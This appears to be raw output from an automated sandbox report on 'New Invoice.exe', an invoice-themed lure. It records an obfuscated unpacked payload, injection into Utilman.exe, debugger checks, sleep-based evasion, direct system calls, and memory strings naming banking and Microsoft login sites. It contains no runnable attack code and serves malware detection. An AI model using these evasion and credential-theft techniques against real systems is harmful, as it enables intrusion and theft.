Source: 0.2.New Invoice.exe.47ad898.0.raw.unpack, o9ErG5YH9B6Se5kMQm.cs	High entropy of concatenated method names: 'T2ycbLELNJ', 'FhycNdSbWT', 'tXecQXoIIE', 'Ub3cnlrYdb', 'I8bcW4JDWp', 'okaQURHSjM', 'x2ZQKFRaAs', 'z4RQ7cmOQG', 'FXAQrZlOOl', 't4IQgem1VD'
Source: 0.2.New Invoice.exe.47ad898.0.raw.unpack, CtwwZOvw1PE5nvTpFn.cs	High entropy of concatenated method names: 'aeInlPFO5N', 'VoknJ5W0Ml', 'BlDn9g89JL', 'yWBnBZM6YY', 'Kdmnakn1R5', 'pMvn41RvD6', 'vS4nDgjiLg', 'IodnoZ0tqx', 'LTInt55p3P', 'vxinflq2Nq'
Source: 0.2.New Invoice.exe.47ad898.0.raw.unpack, kTakehKdqvpG0HLdWU.cs	High entropy of concatenated method names: 'bbTjrfOt7b', 'JCkjRiUEKG', 'iPs3O9OYge', 'WWA3Hd6oXN', 'LBfjiuJvQu', 'kjOjue09uT', 'rwDjstRfh0', 'g3YjMc7jI4', 'L1Ojhsjrlt', 'FAojLyaBeh'
Source: 0.2.New Invoice.exe.47ad898.0.raw.unpack, JkSZ7RHHFFckmtaWNaW.cs	High entropy of concatenated method names: 'WZiyRLrYHP', 'EwJyzWHAB2', 'i2FdOc7qKs', 'jypdHWMqld', 'ynpd2AfpNN', 'vFqdxIBwHr', 'le1dCPStGo', 'O47dbmQQOO', 'V0Fd6FQBaN', 'r6qdNHCw6y'
Source: 0.2.New Invoice.exe.47ad898.0.raw.unpack, Or5NKaw6U8vRo4MLXO.cs	High entropy of concatenated method names: 'z7nn63h3lR', 'tMUnVfXYd8', 'Jpwnc2BIlX', 'Jw5cRHZyGJ', 'xhsczFjXMD', 'aOvnOCSeCi', 'MhdnHMKHBw', 'LuYn291orV', 'U47nxXEaV6', 'Dp5nCUhDp8'
Source: 0.2.New Invoice.exe.47ad898.0.raw.unpack, f3A8pBHOEg1vBjBXysp.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'j4GyivFluh', 'CtLyuZXOWo', 'SyRysvfQ6f', 'kNXyMvfIAj', 'EgHyhlW560', 'Xq0yLM45FS', 'lEhyefvGFM'
Source: 0.2.New Invoice.exe.47ad898.0.raw.unpack, rWnNs0efUX00IrjHdD.cs	High entropy of concatenated method names: 's59jmlV4xO', 'ykZj8GGQIp', 'ToString', 'PFUj6r9uCG', 'umPjNTO3PX', 'AHojVLdvx6', 'QGEjQBMiTo', 'EfYjcDrAsR', 'YZQjnPt3NZ', 'UhVjWUHh1d'
Source: 0.2.New Invoice.exe.47ad898.0.raw.unpack, yEJxLgzbwuuSjRJ3jQ.cs	High entropy of concatenated method names: 'Xl4y45tFGO', 'LmQyospYD2', 'Ja0ytqGrM8', 'UVCyYvIQQl', 'Fs7yPft459', 'uvpy5l7PkM', 'paZy0l31FN', 'rnwyGqT3J1', 'qW9ylpw6en', 'QUVyJtlV52'
Source: 0.2.New Invoice.exe.47ad898.0.raw.unpack, VhLFfGUCVi57MpmsK8.cs	High entropy of concatenated method names: 'BPgjpLcCgr', 'QVmjyVnw1D', 'Gb3jdmLuEZ', 'Y4epS5tixKg2yTWiFqa', 'IV0pfEt6RMBuEIXD1Aa', 'M9QPUOtYDw3y8KJBC71'
Source: 0.2.New Invoice.exe.47ad898.0.raw.unpack, NJUhNmPh8N7bPAEZQT.cs	High entropy of concatenated method names: 'ziqKSGCy5j2TDuPmQR6', 'smUq2sCdGLagjQQ6rOX', 'zc0c368rgk', 'l7IcpVpFvm', 'iqAcyqRpx1', 'xIIZewCn8yHiBas6uY7', 'AR5leGCo1tKMOqOgjRX'
Source: 0.2.New Invoice.exe.47ad898.0.raw.unpack, bBN5f1W5eu358I6eM1.cs	High entropy of concatenated method names: 'FBmxbjLd8j', 'd61x6bkEv3', 'R3sxNRW4bj', 'gJ7xV4wGqH', 'UdbxQYaUJu', 'XYnxcid2s9', 'IknxnThbGW', 'vXYxWcP9C0', 'EuZxqoCftV', 'MdRxm9lMhi'
Source: 0.2.New Invoice.exe.47ad898.0.raw.unpack, WcdB53H2wet4GmbZWu8.cs	High entropy of concatenated method names: 'ToString', 'xT4doVo51M', 'XvxdtKPuII', 'NCAdfaV9nY', 'CBadYhDXmp', 'mLadPSUGWY', 'yVrd1JfLip', 'nsPd5TsQVT', 'xJ2QustvOq4yowJU3BF', 'wvZrEGt92opSXEWb1LG'
Source: 0.2.New Invoice.exe.47ad898.0.raw.unpack, JVrnAsHCwZCEwge8IN7.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'tvKApFrkHQ', 'gjWAyrdYdL', 'Y2BAdb388D', 'AWfAAfkqpe', 'l7vAFWCsIu', 'QfOAX60P7j', 'CPtAGv9GB3'
Source: 0.2.New Invoice.exe.47ad898.0.raw.unpack, bsDGY8VgSO9BxSurjD.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'iYD2gONGXc', 'A3D2R6ys7M', 'KPG2zN1ECZ', 'LiExOF4MLh', 'wjnxHbQrTc', 'NCVx23sUMt', 'RHYxxoYAIb', 'mA8VXWXs3XcIwFLjYEC'
Source: 0.2.New Invoice.exe.47ad898.0.raw.unpack, AdOvZT7ABI4oWsrAZs.cs	High entropy of concatenated method names: 'am4pkdZb2a', 'Ua3pjRaehI', 'I1IppZghQZ', 'rVZpdwW0au', 'OjQpFJKmp6', 'iKwpGOZBuJ', 'Dispose', 'hvJ36yAayk', 'm4C3NwLKIZ', 'o3m3VUIc2Q'
Source: 0.2.New Invoice.exe.47ad898.0.raw.unpack, EK5hK9oCWabKYcxdoC.cs	High entropy of concatenated method names: 'M69NM2DR2w', 'lbQNh5a2LN', 'ojCNLEvVyG', 'cmeNecPwqs', 'RJKNUMI51p', 'S4sNK2AJsR', 'pDbN7eJP0H', 'jnqNrKhJaM', 'ArMNgCYwZi', 'eAUNRPH6vk'
Source: 0.2.New Invoice.exe.47ad898.0.raw.unpack, v26PybNMMKU7Gk7Kf7.cs	High entropy of concatenated method names: 'Dispose', 'N4oHgWsrAZ', 'wIu2PcHYvd', 'h5xlR460ox', 'QDhHRroMBb', 'JjNHzOaQ0P', 'ProcessDialogKey', 'J5L2OaxWdS', 'In32HcMRHa', 'Mbb228337W'
Source: 0.2.New Invoice.exe.47ad898.0.raw.unpack, ewOveD25mXsdtDIXU5.cs	High entropy of concatenated method names: 'msn97di1Q', 'uGLBaM5Vm', 'XS24XJHRP', 'F3vDP4XHy', 'waDtMnygt', 'QdNfk9alw', 'yU1nsuHPPkuSl6fUOF', 'PfvRfeTgSoGou9wNo8', 'miH3WxVU5', 'cCJyH1NTw'
Source: 0.2.New Invoice.exe.47ad898.0.raw.unpack, S7ZkwtC9w9UtY8fsDC.cs	High entropy of concatenated method names: 'jhtHnK5hK9', 'dWaHWbKYcx', 'dDOHmS5oQV', 'YxfH8eXBxc', 'rpSHkYJk9E', 'WG5HZH9B6S', 'iHSolEbr3Kw0myTD8M', 'b3JSLMcLaCoGQ2FqQt', 'ngCHHrEjSQ', 'LJgHxgjHUS'
Source: 0.2.New Invoice.exe.47ad898.0.raw.unpack, SaxWdSg5n3cMRHavbb.cs	High entropy of concatenated method names: 'nt2pY9MM7U', 'KQspP6gWpu', 'GjGp1VPrBF', 'Y1mp5Wlxim', 'Nrmp0AVJb3', 'fdhpESoUZR', 'IOZpwCZO9r', 'HWlpTYoUS5', 'q4CpvtKU84', 'M81pIBHKBZ'

Source: C:\Users\user\Desktop\New Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\New Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\New Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\New Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\New Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\New Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\New Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\New Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\New Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\New Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\New Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\New Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\New Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\New Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\New Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\New Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\New Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\New Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\New Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\New Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\New Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\New Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\New Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\New Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\New Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\New Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\New Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\New Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\New Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\New Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\New Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\New Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\New Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\New Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\New Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\New Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\New Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\New Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\New Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\New Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\Utilman.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\Utilman.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\Utilman.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\Utilman.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\Utilman.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\SysWOW64\Utilman.exe	API/Special instruction interceptor: Address: 7FF8C88ED324
Source: C:\Windows\SysWOW64\Utilman.exe	API/Special instruction interceptor: Address: 7FF8C88ED7E4
Source: C:\Windows\SysWOW64\Utilman.exe	API/Special instruction interceptor: Address: 7FF8C88ED944
Source: C:\Windows\SysWOW64\Utilman.exe	API/Special instruction interceptor: Address: 7FF8C88ED504
Source: C:\Windows\SysWOW64\Utilman.exe	API/Special instruction interceptor: Address: 7FF8C88ED544
Source: C:\Windows\SysWOW64\Utilman.exe	API/Special instruction interceptor: Address: 7FF8C88ED1E4
Source: C:\Windows\SysWOW64\Utilman.exe	API/Special instruction interceptor: Address: 7FF8C88F0154
Source: C:\Windows\SysWOW64\Utilman.exe	API/Special instruction interceptor: Address: 7FF8C88EDA44

Source: C:\Users\user\Desktop\New Invoice.exe	Memory allocated: 10A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\New Invoice.exe	Memory allocated: 2C70000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\New Invoice.exe	Memory allocated: 2A70000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\New Invoice.exe	Memory allocated: 7830000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\New Invoice.exe	Memory allocated: 8830000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\New Invoice.exe	Memory allocated: 89D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\New Invoice.exe	Memory allocated: 99D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\New Invoice.exe	Memory allocated: 9F70000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\New Invoice.exe	Memory allocated: AF70000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\New Invoice.exe	Memory allocated: BF70000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Windows\SysWOW64\Utilman.exe	Window / User API: threadDelayed 860			Jump to behavior
Source: C:\Windows\SysWOW64\Utilman.exe	Window / User API: threadDelayed 9113			Jump to behavior

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report New Invoice.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Windows Analysis Report
New Invoice.exe

Source: C:\Users\user\Desktop\New Invoice.exe	API coverage: 0.7 %
Source: C:\Windows\SysWOW64\Utilman.exe	API coverage: 2.7 %

Source: C:\Users\user\Desktop\New Invoice.exe TID: 3680	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\Utilman.exe TID: 3668	Thread sleep count: 860 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\Utilman.exe TID: 3668	Thread sleep time: -1720000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\Utilman.exe TID: 3668	Thread sleep count: 9113 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\Utilman.exe TID: 3668	Thread sleep time: -18226000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\EwFMJkXliqVLWomtLIRkXXzYcVbLeWardTuktmFLWdegMbezemXYpXczeiGH\hDmn7H3zvRFO6rwhs5DOT.exe TID: 6516	Thread sleep time: -75000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\EwFMJkXliqVLWomtLIRkXXzYcVbLeWardTuktmFLWdegMbezemXYpXczeiGH\hDmn7H3zvRFO6rwhs5DOT.exe TID: 6516	Thread sleep count: 37 > 30	Jump to behavior
Source: C:\Program Files (x86)\EwFMJkXliqVLWomtLIRkXXzYcVbLeWardTuktmFLWdegMbezemXYpXczeiGH\hDmn7H3zvRFO6rwhs5DOT.exe TID: 6516	Thread sleep time: -55500s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\EwFMJkXliqVLWomtLIRkXXzYcVbLeWardTuktmFLWdegMbezemXYpXczeiGH\hDmn7H3zvRFO6rwhs5DOT.exe TID: 6516	Thread sleep count: 39 > 30	Jump to behavior
Source: C:\Program Files (x86)\EwFMJkXliqVLWomtLIRkXXzYcVbLeWardTuktmFLWdegMbezemXYpXczeiGH\hDmn7H3zvRFO6rwhs5DOT.exe TID: 6516	Thread sleep time: -39000s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\Utilman.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\Utilman.exe	Last function: Thread delayed

Source: 421x-3Kv.6.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: 421x-3Kv.6.dr	Binary or memory string: discord.comVMware20,11696428655f
Source: 421x-3Kv.6.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: 421x-3Kv.6.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: 421x-3Kv.6.dr	Binary or memory string: global block list test formVMware20,11696428655
Source: 421x-3Kv.6.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: hDmn7H3zvRFO6rwhs5DOT.exe, 00000008.00000002.4484222396.0000000001079000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllf
Source: 421x-3Kv.6.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: 421x-3Kv.6.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: 421x-3Kv.6.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: 421x-3Kv.6.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: 421x-3Kv.6.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: 421x-3Kv.6.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: 421x-3Kv.6.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: 421x-3Kv.6.dr	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: 421x-3Kv.6.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: 421x-3Kv.6.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: 421x-3Kv.6.dr	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: 421x-3Kv.6.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: 421x-3Kv.6.dr	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: Utilman.exe, 00000006.00000002.4483639342.000000000339E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllC#`
Source: 421x-3Kv.6.dr	Binary or memory string: AMC password management pageVMware20,11696428655
Source: 421x-3Kv.6.dr	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: 421x-3Kv.6.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: 421x-3Kv.6.dr	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: 421x-3Kv.6.dr	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: 421x-3Kv.6.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: 421x-3Kv.6.dr	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: firefox.exe, 00000009.00000002.2533520453.0000013860D4C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll0
Source: 421x-3Kv.6.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: 421x-3Kv.6.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: 421x-3Kv.6.dr	Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: 421x-3Kv.6.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: 421x-3Kv.6.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655

Source: C:\Users\user\Desktop\New Invoice.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\Utilman.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Program Files (x86)\EwFMJkXliqVLWomtLIRkXXzYcVbLeWardTuktmFLWdegMbezemXYpXczeiGH\hDmn7H3zvRFO6rwhs5DOT.exe	NtAllocateVirtualMemory: Direct from: 0x76EF48EC	Jump to behavior
Source: C:\Program Files (x86)\EwFMJkXliqVLWomtLIRkXXzYcVbLeWardTuktmFLWdegMbezemXYpXczeiGH\hDmn7H3zvRFO6rwhs5DOT.exe	NtQueryAttributesFile: Direct from: 0x76EF2E6C	Jump to behavior
Source: C:\Program Files (x86)\EwFMJkXliqVLWomtLIRkXXzYcVbLeWardTuktmFLWdegMbezemXYpXczeiGH\hDmn7H3zvRFO6rwhs5DOT.exe	NtQueryVolumeInformationFile: Direct from: 0x76EF2F2C	Jump to behavior
Source: C:\Program Files (x86)\EwFMJkXliqVLWomtLIRkXXzYcVbLeWardTuktmFLWdegMbezemXYpXczeiGH\hDmn7H3zvRFO6rwhs5DOT.exe	NtQuerySystemInformation: Direct from: 0x76EF48CC	Jump to behavior
Source: C:\Program Files (x86)\EwFMJkXliqVLWomtLIRkXXzYcVbLeWardTuktmFLWdegMbezemXYpXczeiGH\hDmn7H3zvRFO6rwhs5DOT.exe	NtOpenSection: Direct from: 0x76EF2E0C	Jump to behavior
Source: C:\Program Files (x86)\EwFMJkXliqVLWomtLIRkXXzYcVbLeWardTuktmFLWdegMbezemXYpXczeiGH\hDmn7H3zvRFO6rwhs5DOT.exe	NtDeviceIoControlFile: Direct from: 0x76EF2AEC	Jump to behavior
Source: C:\Program Files (x86)\EwFMJkXliqVLWomtLIRkXXzYcVbLeWardTuktmFLWdegMbezemXYpXczeiGH\hDmn7H3zvRFO6rwhs5DOT.exe	NtAllocateVirtualMemory: Direct from: 0x76EF2BEC	Jump to behavior
Source: C:\Program Files (x86)\EwFMJkXliqVLWomtLIRkXXzYcVbLeWardTuktmFLWdegMbezemXYpXczeiGH\hDmn7H3zvRFO6rwhs5DOT.exe	NtQueryInformationToken: Direct from: 0x76EF2CAC	Jump to behavior
Source: C:\Program Files (x86)\EwFMJkXliqVLWomtLIRkXXzYcVbLeWardTuktmFLWdegMbezemXYpXczeiGH\hDmn7H3zvRFO6rwhs5DOT.exe	NtCreateFile: Direct from: 0x76EF2FEC	Jump to behavior
Source: C:\Program Files (x86)\EwFMJkXliqVLWomtLIRkXXzYcVbLeWardTuktmFLWdegMbezemXYpXczeiGH\hDmn7H3zvRFO6rwhs5DOT.exe	NtOpenFile: Direct from: 0x76EF2DCC	Jump to behavior
Source: C:\Program Files (x86)\EwFMJkXliqVLWomtLIRkXXzYcVbLeWardTuktmFLWdegMbezemXYpXczeiGH\hDmn7H3zvRFO6rwhs5DOT.exe	NtTerminateThread: Direct from: 0x76EF2FCC	Jump to behavior
Source: C:\Program Files (x86)\EwFMJkXliqVLWomtLIRkXXzYcVbLeWardTuktmFLWdegMbezemXYpXczeiGH\hDmn7H3zvRFO6rwhs5DOT.exe	NtOpenKeyEx: Direct from: 0x76EF2B9C	Jump to behavior
Source: C:\Program Files (x86)\EwFMJkXliqVLWomtLIRkXXzYcVbLeWardTuktmFLWdegMbezemXYpXczeiGH\hDmn7H3zvRFO6rwhs5DOT.exe	NtSetInformationProcess: Direct from: 0x76EF2C5C	Jump to behavior
Source: C:\Program Files (x86)\EwFMJkXliqVLWomtLIRkXXzYcVbLeWardTuktmFLWdegMbezemXYpXczeiGH\hDmn7H3zvRFO6rwhs5DOT.exe	NtProtectVirtualMemory: Direct from: 0x76EF2F9C	Jump to behavior
Source: C:\Program Files (x86)\EwFMJkXliqVLWomtLIRkXXzYcVbLeWardTuktmFLWdegMbezemXYpXczeiGH\hDmn7H3zvRFO6rwhs5DOT.exe	NtWriteVirtualMemory: Direct from: 0x76EF2E3C	Jump to behavior
Source: C:\Program Files (x86)\EwFMJkXliqVLWomtLIRkXXzYcVbLeWardTuktmFLWdegMbezemXYpXczeiGH\hDmn7H3zvRFO6rwhs5DOT.exe	NtNotifyChangeKey: Direct from: 0x76EF3C2C	Jump to behavior
Source: C:\Program Files (x86)\EwFMJkXliqVLWomtLIRkXXzYcVbLeWardTuktmFLWdegMbezemXYpXczeiGH\hDmn7H3zvRFO6rwhs5DOT.exe	NtCreateMutant: Direct from: 0x76EF35CC	Jump to behavior
Source: C:\Program Files (x86)\EwFMJkXliqVLWomtLIRkXXzYcVbLeWardTuktmFLWdegMbezemXYpXczeiGH\hDmn7H3zvRFO6rwhs5DOT.exe	NtResumeThread: Direct from: 0x76EF36AC	Jump to behavior
Source: C:\Program Files (x86)\EwFMJkXliqVLWomtLIRkXXzYcVbLeWardTuktmFLWdegMbezemXYpXczeiGH\hDmn7H3zvRFO6rwhs5DOT.exe	NtMapViewOfSection: Direct from: 0x76EF2D1C	Jump to behavior
Source: C:\Program Files (x86)\EwFMJkXliqVLWomtLIRkXXzYcVbLeWardTuktmFLWdegMbezemXYpXczeiGH\hDmn7H3zvRFO6rwhs5DOT.exe	NtProtectVirtualMemory: Direct from: 0x76EE7B2E	Jump to behavior
Source: C:\Program Files (x86)\EwFMJkXliqVLWomtLIRkXXzYcVbLeWardTuktmFLWdegMbezemXYpXczeiGH\hDmn7H3zvRFO6rwhs5DOT.exe	NtAllocateVirtualMemory: Direct from: 0x76EF2BFC	Jump to behavior
Source: C:\Program Files (x86)\EwFMJkXliqVLWomtLIRkXXzYcVbLeWardTuktmFLWdegMbezemXYpXczeiGH\hDmn7H3zvRFO6rwhs5DOT.exe	NtQuerySystemInformation: Direct from: 0x76EF2DFC	Jump to behavior
Source: C:\Program Files (x86)\EwFMJkXliqVLWomtLIRkXXzYcVbLeWardTuktmFLWdegMbezemXYpXczeiGH\hDmn7H3zvRFO6rwhs5DOT.exe	NtReadFile: Direct from: 0x76EF2ADC	Jump to behavior
Source: C:\Program Files (x86)\EwFMJkXliqVLWomtLIRkXXzYcVbLeWardTuktmFLWdegMbezemXYpXczeiGH\hDmn7H3zvRFO6rwhs5DOT.exe	NtDelayExecution: Direct from: 0x76EF2DDC	Jump to behavior
Source: C:\Program Files (x86)\EwFMJkXliqVLWomtLIRkXXzYcVbLeWardTuktmFLWdegMbezemXYpXczeiGH\hDmn7H3zvRFO6rwhs5DOT.exe	NtQueryInformationProcess: Direct from: 0x76EF2C26	Jump to behavior
Source: C:\Program Files (x86)\EwFMJkXliqVLWomtLIRkXXzYcVbLeWardTuktmFLWdegMbezemXYpXczeiGH\hDmn7H3zvRFO6rwhs5DOT.exe	NtResumeThread: Direct from: 0x76EF2FBC	Jump to behavior
Source: C:\Program Files (x86)\EwFMJkXliqVLWomtLIRkXXzYcVbLeWardTuktmFLWdegMbezemXYpXczeiGH\hDmn7H3zvRFO6rwhs5DOT.exe	NtCreateUserProcess: Direct from: 0x76EF371C	Jump to behavior
Source: C:\Program Files (x86)\EwFMJkXliqVLWomtLIRkXXzYcVbLeWardTuktmFLWdegMbezemXYpXczeiGH\hDmn7H3zvRFO6rwhs5DOT.exe	NtAllocateVirtualMemory: Direct from: 0x76EF3C9C	Jump to behavior
Source: C:\Program Files (x86)\EwFMJkXliqVLWomtLIRkXXzYcVbLeWardTuktmFLWdegMbezemXYpXczeiGH\hDmn7H3zvRFO6rwhs5DOT.exe	NtWriteVirtualMemory: Direct from: 0x76EF490C	Jump to behavior
Source: C:\Program Files (x86)\EwFMJkXliqVLWomtLIRkXXzYcVbLeWardTuktmFLWdegMbezemXYpXczeiGH\hDmn7H3zvRFO6rwhs5DOT.exe	NtSetInformationThread: Direct from: 0x76EE63F9	Jump to behavior
Source: C:\Program Files (x86)\EwFMJkXliqVLWomtLIRkXXzYcVbLeWardTuktmFLWdegMbezemXYpXczeiGH\hDmn7H3zvRFO6rwhs5DOT.exe	NtClose: Direct from: 0x76EF2B6C
Source: C:\Program Files (x86)\EwFMJkXliqVLWomtLIRkXXzYcVbLeWardTuktmFLWdegMbezemXYpXczeiGH\hDmn7H3zvRFO6rwhs5DOT.exe	NtSetInformationThread: Direct from: 0x76EF2B4C	Jump to behavior
Source: C:\Program Files (x86)\EwFMJkXliqVLWomtLIRkXXzYcVbLeWardTuktmFLWdegMbezemXYpXczeiGH\hDmn7H3zvRFO6rwhs5DOT.exe	NtReadVirtualMemory: Direct from: 0x76EF2E8C	Jump to behavior
Source: C:\Program Files (x86)\EwFMJkXliqVLWomtLIRkXXzYcVbLeWardTuktmFLWdegMbezemXYpXczeiGH\hDmn7H3zvRFO6rwhs5DOT.exe	NtCreateKey: Direct from: 0x76EF2C6C	Jump to behavior

